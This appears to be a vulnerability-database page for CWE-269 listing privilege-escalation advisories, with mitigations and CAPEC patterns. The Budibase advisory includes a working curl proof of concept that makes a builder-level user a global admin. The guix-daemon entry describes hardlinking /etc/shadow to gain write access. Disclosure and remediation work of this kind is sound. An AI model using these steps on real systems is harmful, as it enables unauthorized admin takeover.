Common Weakness Enumeration

CWE-269

Discouraged

Improper Privilege Management

Abstraction: Class · Status: Draft

The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.

5455 vulnerabilities reference this CWE, most recent first.

GHSA-C4PC-6X2G-4CHR

Vulnerability from github – Published: 2025-03-11 06:30 – Updated: 2025-03-11 06:30
VLAI
Details

Improper Privilege Management vulnerability in ZTE GoldenDB allows Privilege Escalation.This issue affects GoldenDB: from 6.1.03 through 6.1.03.05.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-26707"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-11T04:15:25Z",
    "severity": "MODERATE"
  },
  "details": "Improper Privilege Management vulnerability in ZTE GoldenDB allows Privilege Escalation.This issue affects GoldenDB: from 6.1.03 through 6.1.03.05.",
  "id": "GHSA-c4pc-6x2g-4chr",
  "modified": "2025-03-11T06:30:38Z",
  "published": "2025-03-11T06:30:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26707"
    },
    {
      "type": "WEB",
      "url": "https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/6999218053484646470"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C4QG-FGX5-7XG5

Vulnerability from github – Published: 2026-02-20 18:31 – Updated: 2026-02-23 21:31
VLAI
Details

An issue in Key Systems Inc Global Facilities Management Software v.20230721a allows a remote attacker to escalate privileges via PIN component of the login functionality.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-26722"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-20T17:25:55Z",
    "severity": "CRITICAL"
  },
  "details": "An issue in Key Systems Inc Global Facilities Management Software v.20230721a allows a remote attacker to escalate privileges via PIN component of the login functionality.",
  "id": "GHSA-c4qg-fgx5-7xg5",
  "modified": "2026-02-23T21:31:23Z",
  "published": "2026-02-20T18:31:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26722"
    },
    {
      "type": "WEB",
      "url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2026-26722"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C4RX-M7VW-65HG

Vulnerability from github – Published: 2025-09-30 15:30 – Updated: 2025-09-30 15:30
VLAI
Details

Local privilege escalation due to insecure XPC service configuration. The following products are affected: Acronis True Image (macOS) before build 42389, Acronis True Image for SanDisk (macOS) before build 42198, Acronis True Image for Western Digital (macOS) before build 42197.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-7779"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-30T15:15:59Z",
    "severity": "HIGH"
  },
  "details": "Local privilege escalation due to insecure XPC service configuration. The following products are affected: Acronis True Image (macOS) before build 42389, Acronis True Image for SanDisk (macOS) before build 42198, Acronis True Image for Western Digital (macOS) before build 42197.",
  "id": "GHSA-c4rx-m7vw-65hg",
  "modified": "2025-09-30T15:30:30Z",
  "published": "2025-09-30T15:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7779"
    },
    {
      "type": "WEB",
      "url": "https://security-advisory.acronis.com/advisories/SEC-8193"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C538-4CM5-RH89

Vulnerability from github – Published: 2022-11-08 12:00 – Updated: 2022-11-08 19:00
VLAI
Details

Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 39900.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-44732"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269",
      "CWE-732"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-11-07T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 39900.",
  "id": "GHSA-c538-4cm5-rh89",
  "modified": "2022-11-08T19:00:25Z",
  "published": "2022-11-08T12:00:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-44732"
    },
    {
      "type": "WEB",
      "url": "https://security-advisory.acronis.com/advisories/SEC-3040"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C54J-XP92-WH28

Vulnerability from github – Published: 2026-05-18 17:42 – Updated: 2026-06-08 23:51
VLAI
Summary
Budibase: Builder-to-Admin Privilege Escalation via onboardUsers Endpoint Without SMTP Configuration
Details

Summary

The POST /api/global/users/onboard endpoint is protected by workspaceBuilderOrAdmin middleware, allowing any user with builder permissions to access it. When SMTP email is not configured (the default for self-hosted Budibase instances), this endpoint bypasses the admin-restricted invite flow and directly creates users via bulkCreate, accepting arbitrary admin and builder role assignments from the request body. A builder-level user can create a new global admin account and receive the generated password in the response, achieving full privilege escalation.

Details

The vulnerability stems from a mismatch between the authorization level of the onboardUsers endpoint and the user-creation capabilities it exposes when SMTP is not configured.

Route definition (packages/worker/src/api/routes/global/users.ts:93-109):

builderOrAdminRoutes  // <-- allows builders, not just admins
  .post(
    "/api/global/users/onboard",
    buildInviteMultipleValidation(),
    controller.onboardUsers
  )

Compare with the invite and inviteMultiple endpoints which are correctly admin-only:

adminRoutes  // <-- admin only
  .post("/api/global/users/invite", buildInviteValidation(), controller.invite)
  .post("/api/global/users/multi/invite", buildInviteMultipleValidation(), controller.inviteMultiple)

Controller (packages/worker/src/api/controllers/global/users.ts:601-630):

export const onboardUsers = async (ctx) => {
  if (await isEmailConfigured()) {
    await inviteMultiple(ctx)  // admin-only path (delegates to invite flow)
    return
  }

  // No SMTP → directly create users with attacker-controlled roles
  const users = ctx.request.body.map(invite => {
    const password = generatePassword(12)
    createdPasswords[invite.email] = password
    return {
      email: invite.email,
      password,
      forceResetPassword: true,
      roles: invite.userInfo.apps || {},
      admin: { global: !!invite.userInfo.admin },  // <-- attacker-controlled
      builder: invite.userInfo.builder,              // <-- attacker-controlled
      tenantId: tenancy.getTenantId(),
    }
  })

  let resp = await userSdk.db.bulkCreate(users)
  for (const user of resp.successful) {
    user.password = createdPasswords[user.email]  // <-- password returned!
  }
  ctx.body = { ...resp, created: true }
}

Middleware pass-through (packages/backend-core/src/middleware/workspaceBuilderOrAdmin.ts:10-26):

In the worker context (env.isWorker() is true), when there is no workspaceId parameter in the request (which there isn't for the onboard endpoint), the middleware at line 19 checks !workspaceId && env.isWorker() — this is true, so it falls through to line 21 which only checks hasBuilderPermissions. Any global builder passes.

Validation gap (buildInviteMultipleValidation at line 37-45): The Joi schema validates userInfo as Joi.object().optional() with no constraints on its contents, so admin and builder fields pass through.

No downstream check: bulkCreate and buildUser do not strip or validate admin/builder fields — they are written directly to the user document in CouchDB.

PoC

Prerequisites: A self-hosted Budibase instance (default: no SMTP configured) and a user account with builder-level access.

Step 1: Authenticate as a builder user and obtain the session cookie:

# Login as builder
curl -s -c cookies.txt -X POST 'http://localhost:10000/api/global/auth/default/login' \
  -H 'Content-Type: application/json' \
  -d '{"username":"builder@example.com","password":"builderpassword"}'

Step 2: Create a new global admin user via the onboard endpoint:

curl -s -X POST 'http://localhost:10000/api/global/users/onboard' \
  -H 'Content-Type: application/json' \
  -b cookies.txt \
  -d '[{"email":"pwned-admin@attacker.com","userInfo":{"admin":{"global":true}}}]'

Expected response (includes the generated password):

{
  "successful": [{"email":"pwned-admin@attacker.com","password":"<generated-12-char-password>","admin":{"global":true},...}],
  "unsuccessful": [],
  "created": true
}

Step 3: Login as the new admin:

curl -s -X POST 'http://localhost:10000/api/global/auth/default/login' \
  -H 'Content-Type: application/json' \
  -d '{"username":"pwned-admin@attacker.com","password":"<password-from-step-2>"}'

The attacker now has full global admin access.

Impact

  • Privilege escalation: Any builder-level user can escalate to global admin on self-hosted Budibase instances without SMTP configured (the default deployment).
  • Full platform compromise: Global admin can access all apps, all data sources, manage all users, delete apps, and modify platform configuration.
  • Credential exposure: The generated password is returned in the HTTP response, giving the attacker immediate access to the new admin account.
  • Stealth: The created user appears as a legitimately onboarded user, making detection difficult without audit log review.
  • Wide applicability: Self-hosted Budibase instances commonly run without SMTP configuration, making this the default-exploitable path.

Recommended Fix

Move the onboardUsers route from builderOrAdminRoutes to adminRoutes to match the authorization level of invite and inviteMultiple:

--- a/packages/worker/src/api/routes/global/users.ts
+++ b/packages/worker/src/api/routes/global/users.ts
-builderOrAdminRoutes
+adminRoutes
   .post(
     "/api/global/users/onboard",
     buildInviteMultipleValidation(),
     controller.onboardUsers
   )

Additionally, the onboardUsers controller should validate that the caller has sufficient permissions to assign the requested role level. Even admin users should not be able to create users with roles exceeding their own. Consider adding explicit validation in the controller:

// In onboardUsers, before bulkCreate:
for (const invite of ctx.request.body) {
  if (invite.userInfo.admin && !ctx.user.admin?.global) {
    ctx.throw(403, "Only admins can create admin users")
  }
}
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@budibase/worker"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.38.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45716"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-18T17:42:24Z",
    "nvd_published_at": "2026-05-27T18:16:25Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `POST /api/global/users/onboard` endpoint is protected by `workspaceBuilderOrAdmin` middleware, allowing any user with builder permissions to access it. When SMTP email is not configured (the default for self-hosted Budibase instances), this endpoint bypasses the admin-restricted invite flow and directly creates users via `bulkCreate`, accepting arbitrary `admin` and `builder` role assignments from the request body. A builder-level user can create a new global admin account and receive the generated password in the response, achieving full privilege escalation.\n\n## Details\n\nThe vulnerability stems from a mismatch between the authorization level of the `onboardUsers` endpoint and the user-creation capabilities it exposes when SMTP is not configured.\n\n**Route definition** (`packages/worker/src/api/routes/global/users.ts:93-109`):\n```typescript\nbuilderOrAdminRoutes  // \u003c-- allows builders, not just admins\n  .post(\n    \"/api/global/users/onboard\",\n    buildInviteMultipleValidation(),\n    controller.onboardUsers\n  )\n```\n\nCompare with the `invite` and `inviteMultiple` endpoints which are correctly admin-only:\n```typescript\nadminRoutes  // \u003c-- admin only\n  .post(\"/api/global/users/invite\", buildInviteValidation(), controller.invite)\n  .post(\"/api/global/users/multi/invite\", buildInviteMultipleValidation(), controller.inviteMultiple)\n```\n\n**Controller** (`packages/worker/src/api/controllers/global/users.ts:601-630`):\n```typescript\nexport const onboardUsers = async (ctx) =\u003e {\n  if (await isEmailConfigured()) {\n    await inviteMultiple(ctx)  // admin-only path (delegates to invite flow)\n    return\n  }\n\n  // No SMTP \u2192 directly create users with attacker-controlled roles\n  const users = ctx.request.body.map(invite =\u003e {\n    const password = generatePassword(12)\n    createdPasswords[invite.email] = password\n    return {\n      email: invite.email,\n      password,\n      forceResetPassword: true,\n      roles: invite.userInfo.apps || {},\n      admin: { global: !!invite.userInfo.admin },  // \u003c-- attacker-controlled\n      builder: invite.userInfo.builder,              // \u003c-- attacker-controlled\n      tenantId: tenancy.getTenantId(),\n    }\n  })\n\n  let resp = await userSdk.db.bulkCreate(users)\n  for (const user of resp.successful) {\n    user.password = createdPasswords[user.email]  // \u003c-- password returned!\n  }\n  ctx.body = { ...resp, created: true }\n}\n```\n\n**Middleware pass-through** (`packages/backend-core/src/middleware/workspaceBuilderOrAdmin.ts:10-26`):\n\nIn the worker context (`env.isWorker()` is `true`), when there is no `workspaceId` parameter in the request (which there isn\u0027t for the onboard endpoint), the middleware at line 19 checks `!workspaceId \u0026\u0026 env.isWorker()` \u2014 this is `true`, so it falls through to line 21 which only checks `hasBuilderPermissions`. Any global builder passes.\n\n**Validation gap** (`buildInviteMultipleValidation` at line 37-45): The Joi schema validates `userInfo` as `Joi.object().optional()` with no constraints on its contents, so `admin` and `builder` fields pass through.\n\n**No downstream check**: `bulkCreate` and `buildUser` do not strip or validate admin/builder fields \u2014 they are written directly to the user document in CouchDB.\n\n## PoC\n\n**Prerequisites:** A self-hosted Budibase instance (default: no SMTP configured) and a user account with builder-level access.\n\n**Step 1:** Authenticate as a builder user and obtain the session cookie:\n```bash\n# Login as builder\ncurl -s -c cookies.txt -X POST \u0027http://localhost:10000/api/global/auth/default/login\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"username\":\"builder@example.com\",\"password\":\"builderpassword\"}\u0027\n```\n\n**Step 2:** Create a new global admin user via the onboard endpoint:\n```bash\ncurl -s -X POST \u0027http://localhost:10000/api/global/users/onboard\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -b cookies.txt \\\n  -d \u0027[{\"email\":\"pwned-admin@attacker.com\",\"userInfo\":{\"admin\":{\"global\":true}}}]\u0027\n```\n\n**Expected response** (includes the generated password):\n```json\n{\n  \"successful\": [{\"email\":\"pwned-admin@attacker.com\",\"password\":\"\u003cgenerated-12-char-password\u003e\",\"admin\":{\"global\":true},...}],\n  \"unsuccessful\": [],\n  \"created\": true\n}\n```\n\n**Step 3:** Login as the new admin:\n```bash\ncurl -s -X POST \u0027http://localhost:10000/api/global/auth/default/login\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"username\":\"pwned-admin@attacker.com\",\"password\":\"\u003cpassword-from-step-2\u003e\"}\u0027\n```\n\nThe attacker now has full global admin access.\n\n## Impact\n\n- **Privilege escalation:** Any builder-level user can escalate to global admin on self-hosted Budibase instances without SMTP configured (the default deployment).\n- **Full platform compromise:** Global admin can access all apps, all data sources, manage all users, delete apps, and modify platform configuration.\n- **Credential exposure:** The generated password is returned in the HTTP response, giving the attacker immediate access to the new admin account.\n- **Stealth:** The created user appears as a legitimately onboarded user, making detection difficult without audit log review.\n- **Wide applicability:** Self-hosted Budibase instances commonly run without SMTP configuration, making this the default-exploitable path.\n\n## Recommended Fix\n\nMove the `onboardUsers` route from `builderOrAdminRoutes` to `adminRoutes` to match the authorization level of `invite` and `inviteMultiple`:\n\n```diff\n--- a/packages/worker/src/api/routes/global/users.ts\n+++ b/packages/worker/src/api/routes/global/users.ts\n-builderOrAdminRoutes\n+adminRoutes\n   .post(\n     \"/api/global/users/onboard\",\n     buildInviteMultipleValidation(),\n     controller.onboardUsers\n   )\n```\n\nAdditionally, the `onboardUsers` controller should validate that the caller has sufficient permissions to assign the requested role level. Even admin users should not be able to create users with roles exceeding their own. Consider adding explicit validation in the controller:\n\n```typescript\n// In onboardUsers, before bulkCreate:\nfor (const invite of ctx.request.body) {\n  if (invite.userInfo.admin \u0026\u0026 !ctx.user.admin?.global) {\n    ctx.throw(403, \"Only admins can create admin users\")\n  }\n}\n```",
  "id": "GHSA-c54j-xp92-wh28",
  "modified": "2026-06-08T23:51:23Z",
  "published": "2026-05-18T17:42:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/security/advisories/GHSA-c54j-xp92-wh28"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45716"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Budibase/budibase"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/releases/tag/3.38.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Budibase: Builder-to-Admin Privilege Escalation via onboardUsers Endpoint Without SMTP Configuration"
}

GHSA-C562-6QMH-Q9QG

Vulnerability from github – Published: 2024-05-17 09:31 – Updated: 2024-05-17 09:31
VLAI
Details

Improper Privilege Management vulnerability in Saleswonder Team WebinarIgnition allows Privilege Escalation.This issue affects WebinarIgnition: from n/a through 3.05.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-51424"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-17T09:15:17Z",
    "severity": "CRITICAL"
  },
  "details": "Improper Privilege Management vulnerability in Saleswonder Team WebinarIgnition allows Privilege Escalation.This issue affects WebinarIgnition: from n/a through 3.05.0.",
  "id": "GHSA-c562-6qmh-q9qg",
  "modified": "2024-05-17T09:31:01Z",
  "published": "2024-05-17T09:31:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51424"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/webinar-ignition/wordpress-webinarignition-plugin-3-05-0-unauthenticated-privilege-escalation-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C576-VG8P-CVRC

Vulnerability from github – Published: 2024-03-11 18:31 – Updated: 2024-08-05 21:31
VLAI
Details

In installExistingPackageAsUser of InstallPackageHelper.java, there is a possible carrier restriction bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-0046"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-11T17:15:45Z",
    "severity": "HIGH"
  },
  "details": "In installExistingPackageAsUser of InstallPackageHelper.java, there is a possible carrier restriction bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.",
  "id": "GHSA-c576-vg8p-cvrc",
  "modified": "2024-08-05T21:31:17Z",
  "published": "2024-03-11T18:31:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0046"
    },
    {
      "type": "WEB",
      "url": "https://android.googlesource.com/platform/frameworks/base/+/d68cab5ac1aa294ec4d0419bc0803a5577e4e43c"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/security/bulletin/2024-03-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C58G-QW82-6M5X

Vulnerability from github – Published: 2025-10-21 12:31 – Updated: 2025-10-21 12:31
VLAI
Details

ZohoCorp ManageEngine Endpoint Central versions earlier than 11.4.2508.14, 11.4.2516.06, and 11.4.2518.01 are affected by an arbitrary file deletion vulnerability in the agent setup component.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-5496"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-21T10:15:34Z",
    "severity": "LOW"
  },
  "details": "ZohoCorp ManageEngine Endpoint Central versions earlier than 11.4.2508.14, 11.4.2516.06, and 11.4.2518.01 are affected by an arbitrary file deletion vulnerability in the agent setup component.",
  "id": "GHSA-c58g-qw82-6m5x",
  "modified": "2025-10-21T12:31:26Z",
  "published": "2025-10-21T12:31:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5496"
    },
    {
      "type": "WEB",
      "url": "https://www.manageengine.com/products/desktop-central/kb/arbitrary-file-deletion-allows-local-privilege-escalation.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C5CP-QFJ2-J929

Vulnerability from github – Published: 2022-05-13 01:48 – Updated: 2022-05-13 01:48
VLAI
Details

The Windows kernel in Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allows an elevation of privilege vulnerability due to the way memory addresses are handled, aka "Windows Elevation of Privilege Vulnerability".

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-0748"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-01-04T14:29:00Z",
    "severity": "HIGH"
  },
  "details": "The Windows kernel in Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allows an elevation of privilege vulnerability due to the way memory addresses are handled, aka \"Windows Elevation of Privilege Vulnerability\".",
  "id": "GHSA-c5cp-qfj2-j929",
  "modified": "2022-05-13T01:48:21Z",
  "published": "2022-05-13T01:48:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-0748"
    },
    {
      "type": "WEB",
      "url": "https://95cnsec.com/windows-kernel-cve-2018-0748-exploit.html"
    },
    {
      "type": "WEB",
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0748"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/43514"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/102354"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1040095"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C5FP-QRW2-8X2W

Vulnerability from github – Published: 2022-05-24 22:28 – Updated: 2022-07-30 00:00
VLAI
Details

A security vulnerability that can lead to local privilege escalation has been found in ’guix-daemon’. It affects multi-user setups in which ’guix-daemon’ runs locally. The attack consists in having an unprivileged user spawn a build process, for instance with guix build, that makes its build directory world-writable. The user then creates a hardlink to a root-owned file such as /etc/shadow in that build directory. If the user passed the --keep-failed option and the build eventually fails, the daemon changes ownership of the whole build tree, including the hardlink, to the user. At that point, the user has write access to the target file. Versions after and including v0.11.0-3298-g2608e40988, and versions prior to v1.2.0-75109-g94f0312546 are vulnerable.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-27851"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269",
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-04-26T16:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A security vulnerability that can lead to local privilege escalation has been found in \u2019guix-daemon\u2019. It affects multi-user setups in which \u2019guix-daemon\u2019 runs locally. The attack consists in having an unprivileged user spawn a build process, for instance with `guix build`, that makes its build directory world-writable. The user then creates a hardlink to a root-owned file such as /etc/shadow in that build directory. If the user passed the --keep-failed option and the build eventually fails, the daemon changes ownership of the whole build tree, including the hardlink, to the user. At that point, the user has write access to the target file. Versions after and including v0.11.0-3298-g2608e40988, and versions prior to v1.2.0-75109-g94f0312546 are vulnerable.",
  "id": "GHSA-c5fp-qrw2-8x2w",
  "modified": "2022-07-30T00:00:35Z",
  "published": "2022-05-24T22:28:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27851"
    },
    {
      "type": "WEB",
      "url": "https://bugs.gnu.org/47229"
    },
    {
      "type": "WEB",
      "url": "https://guix.gnu.org/en/blog/2021/risk-of-local-privilege-escalation-via-guix-daemon"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-1
Architecture and Design Operation

Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.

Mitigation MIT-48
Architecture and Design

Strategy: Separation of Privilege

Follow the principle of least privilege when assigning access rights to entities in a software system.

Mitigation MIT-49
Architecture and Design

Strategy: Separation of Privilege

Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource.

CAPEC-122: Privilege Abuse

An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources.

CAPEC-233: Privilege Escalation

An adversary exploits a weakness enabling them to elevate their privilege and perform an action that they are not supposed to be authorized to perform.

CAPEC-58: Restful Privilege Elevation

An adversary identifies a Rest HTTP (Get, Put, Delete) style permission method allowing them to perform various malicious actions upon server data due to lack of access control mechanisms implemented within the application service accepting HTTP messages.